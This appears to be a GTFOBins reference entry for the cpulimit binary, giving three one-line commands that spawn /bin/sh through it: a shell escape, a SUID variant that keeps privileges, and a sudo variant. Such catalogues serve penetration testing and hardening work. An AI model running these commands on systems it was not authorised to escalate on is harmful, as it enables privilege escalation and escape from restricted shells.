GTFOBins.github.io/_gtfobins/cpulimit.md
2021-02-27 12:06:40 +01:00

10 lines
174 B
Markdown

---
functions:
shell:
- code: cpulimit -l 100 -f /bin/sh
suid:
- code: ./cpulimit -l 100 -f -- /bin/sh -p
sudo:
- code: sudo cpulimit -l 100 -f /bin/sh
---